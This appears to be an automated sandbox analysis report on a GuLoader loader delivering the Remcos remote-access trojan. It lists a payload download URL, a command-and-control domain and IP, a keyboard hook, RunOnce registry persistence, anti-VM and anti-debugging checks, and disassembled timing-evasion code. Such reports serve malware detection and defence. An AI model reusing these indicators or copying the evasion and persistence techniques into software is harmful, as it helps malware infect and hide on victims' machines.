Source: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp |
Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw"} |
Source: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe |
ReversingLabs: Detection: 17% |
Source: pRcHGlVekw.exe |
ReversingLabs: Detection: 17% |
Source: Yara match |
File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY |
Source: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe |
Joe Sandbox ML: detected |
Source: pRcHGlVekw.exe |
Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: Malware configuration extractor |
URLs: http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw |
Source: unknown |
DNS query: name: wealthyrem.ddns.net |
Source: global traffic |
TCP traffic: 192.168.2.3:49737 -> 194.5.97.128:39200 |
Source: Joe Sandbox View |
IP Address: 194.5.97.128 |
Source: Joe Sandbox View |
IP Address: 101.99.94.119 |
Source: Joe Sandbox View |
ASN Name: DANILENKODE |
Source: Joe Sandbox View |
ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY |
Source: global traffic |
HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 101.99.94.119
Cache-Control: no-cache |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
DNS traffic detected: queries for: wealthyrem.ddns.net |
Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp |
String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin |
Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp |
String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\pRcHGlVekw.exe |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Process Stats: CPU usage > 98% |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218929D NtProtectVirtualMemory, |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218435F NtWriteVirtualMemory, |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_021859E6 NtAllocateVirtualMemory, |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02185A22 NtAllocateVirtualMemory, |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218486E NtWriteVirtualMemory, |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_021846AC NtWriteVirtualMemory, |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02184CFA NtWriteVirtualMemory, |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218914B NtProtectVirtualMemory, |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02185564 NtWriteVirtualMemory,TerminateProcess, |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02181766 NtWriteVirtualMemory, |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02183DA0 NtWriteVirtualMemory, |
Source: pRcHGlVekw.exe |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: UNDERDEVELOPED.exe.16.dr |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: pRcHGlVekw.exe, 00000001.00000000.219062533.0000000000417000.00000002.00020000.sdmp |
Binary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe |
Source: pRcHGlVekw.exe, 00000001.00000002.344452128.0000000002090000.00000002.00000001.sdmp |
Binary or memory string: OriginalFilenameuser32j% vs pRcHGlVekw.exe |
Source: pRcHGlVekw.exe, 00000010.00000002.1306296984.000000001DD60000.00000002.00000001.sdmp |
Binary or memory string: OriginalFilenamemswsock.dll.muij% vs pRcHGlVekw.exe |
Source: pRcHGlVekw.exe, 00000010.00000000.341877354.0000000000417000.00000002.00020000.sdmp |
Binary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe |
Source: pRcHGlVekw.exe |
Binary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe |
Source: classification engine |
Classification label: mal100.troj.spyw.evad.winEXE@3/3@175/3 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
File created: C:\Users\user\AppData\Roaming\remcos |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
File created: C:\Users\user\AppData\Local\Temp\~DF4931134DE445F613.TMP |
Source: pRcHGlVekw.exe |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Section loaded: C:\Windows\SysWOW64\msvbvm60.dll |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
File read: C:\Users\user\Desktop\pRcHGlVekw.exe |
Source: unknown |
Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe' |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe' |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 |
Source: Yara match |
File source: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_00407108 push ebp; retf |
1_2_00407109 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218A033 push ds; retf |
1_2_0218A036 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218A037 push ds; retf |
1_2_0218A03A |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218A02B push ds; retf |
1_2_0218A02E |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218A02F push ds; retf |
1_2_0218A032 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218A027 push ds; retf |
1_2_0218A02A |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 16_2_0056A037 push ds; retf |
16_2_0056A03A |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 16_2_0056A033 push ds; retf |
16_2_0056A036 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 16_2_0056A027 push ds; retf |
16_2_0056A02A |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 16_2_0056A02F push ds; retf |
16_2_0056A032 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 16_2_0056A02B push ds; retf |
16_2_0056A02E |
Source: initial sample |
Static PE information: section name: .text entropy: 7.08042704515 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
File created: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
File opened: C:\Program Files\Qemu-ga\qemu-ga.exe |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
File opened: C:\Program Files\qga\qga.exe |
Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp |
Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=\UNDERDEVELOPED.EXE\HOMOTYPYSET W = CREATEOBJECT("WSCRIPT.SHELL") |
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp, pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp |
Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE |
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp |
Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\UNDERDEVELOPED.EXE\HOMOTYPYSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCEDRAWSPAN |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
RDTSC instruction interceptor: First address: 0000000002187EBB second address: 0000000002187EBB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 01B6460Dh 0x00000007 xor eax, BEFED3B1h 0x0000000c sub eax, 17554910h 0x00000011 add eax, 580CB355h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F4E1C9F6F80h 0x0000001e lfence 0x00000021 mov edx, 1889B9A2h 0x00000026 xor edx, A7C3F6EDh 0x0000002c add edx, 20E9D255h 0x00000032 xor edx, 9FCA21B0h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d test dh, 0000006Eh 0x00000040 test cx, cx 0x00000043 cmp cx, dx 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a test dh, ah 0x0000004c add edi, edx 0x0000004e dec dword ptr [ebp+000000F8h] 0x00000054 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000005b jne 00007F4E1C9F6E7Ah 0x0000005d call 00007F4E1C9F6EDDh 0x00000062 call 00007F4E1C9F6FA1h 0x00000067 lfence 0x0000006a mov edx, 1889B9A2h 0x0000006f xor edx, A7C3F6EDh 0x00000075 add edx, 20E9D255h 0x0000007b xor edx, 9FCA21B0h 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 test dh, 0000006Eh 0x00000089 test cx, cx 0x0000008c cmp cx, dx 0x0000008f ret 0x00000090 mov esi, edx 0x00000092 pushad 0x00000093 rdtsc |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
RDTSC instruction interceptor: First address: 0000000002187FF6 second address: 0000000002187FF6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DFFADC29h 0x00000013 xor eax, 5D423971h 0x00000018 xor eax, 6D1D2D19h 0x0000001d add eax, 105A37C0h 0x00000022 cpuid 0x00000024 psubd mm7, mm2 0x00000027 bt ecx, 1Fh 0x0000002b jc 00007F4E1C91B0F3h 0x00000031 popad 0x00000032 call 00007F4E1C91ABBEh 0x00000037 lfence 0x0000003a rdtsc |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
RDTSC instruction interceptor: First address: 0000000000567EBB second address: 0000000000567EBB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 01B6460Dh 0x00000007 xor eax, BEFED3B1h 0x0000000c sub eax, 17554910h 0x00000011 add eax, 580CB355h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F4E1C9F6F80h 0x0000001e lfence 0x00000021 mov edx, 1889B9A2h 0x00000026 xor edx, A7C3F6EDh 0x0000002c add edx, 20E9D255h 0x00000032 xor edx, 9FCA21B0h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d test dh, 0000006Eh 0x00000040 test cx, cx 0x00000043 cmp cx, dx 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a test dh, ah 0x0000004c add edi, edx 0x0000004e dec dword ptr [ebp+000000F8h] 0x00000054 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000005b jne 00007F4E1C9F6E7Ah 0x0000005d call 00007F4E1C9F6EDDh 0x00000062 call 00007F4E1C9F6FA1h 0x00000067 lfence 0x0000006a mov edx, 1889B9A2h 0x0000006f xor edx, A7C3F6EDh 0x00000075 add edx, 20E9D255h 0x0000007b xor edx, 9FCA21B0h 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 test dh, 0000006Eh 0x00000089 test cx, cx 0x0000008c cmp cx, dx 0x0000008f ret 0x00000090 mov esi, edx 0x00000092 pushad 0x00000093 rdtsc |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
RDTSC instruction interceptor: First address: 0000000000567FF6 second address: 0000000000567FF6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DFFADC29h 0x00000013 xor eax, 5D423971h 0x00000018 xor eax, 6D1D2D19h 0x0000001d add eax, 105A37C0h 0x00000022 cpuid 0x00000024 psubd mm7, mm2 0x00000027 bt ecx, 1Fh 0x0000002b jc 00007F4E1C91B0F3h 0x00000031 popad 0x00000032 call 00007F4E1C91ABBEh 0x00000037 lfence 0x0000003a rdtsc |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02187EB3 rdtsc |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Window / User API: foregroundWindowGot 547 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe TID: 5624 |
Thread sleep count: 276 > 30 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe TID: 5624 |
Thread sleep time: -138000s >= -30000s |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Last function: Thread delayed |
Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp |
Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=\UNDERDEVELOPED.exe\HOMOTYPYSet W = CreateObject("WScript.Shell") |
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp |
Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\UNDERDEVELOPED.exe\HOMOTYPYSoftware\Microsoft\Windows\CurrentVersion\RunOnceDRAWSPAN |
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp, pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp |
Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
System information queried: ModuleInformation |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Thread information set: HideFromDebugger |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Process queried: DebugPort |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02186663 LdrInitializeThunk, |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02188817 mov eax, dword ptr fs:[00000030h] |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02182EC2 mov eax, dword ptr fs:[00000030h] |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02187540 mov eax, dword ptr fs:[00000030h] |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02183944 mov eax, dword ptr fs:[00000030h] |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02187BB8 mov eax, dword ptr fs:[00000030h] |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_021855ED mov eax, dword ptr fs:[00000030h] |
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp |
Binary or memory string: Program Manager |
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp |
Binary or memory string: Shell_TrayWnd |
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp |
Binary or memory string: Progman |
Source: logs.dat.16.dr |
Binary or memory string: [ Program Manager ] |
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp |
Binary or memory string: Progmanlock |
Source: Initial file |
Signature Results: GuLoader behavior |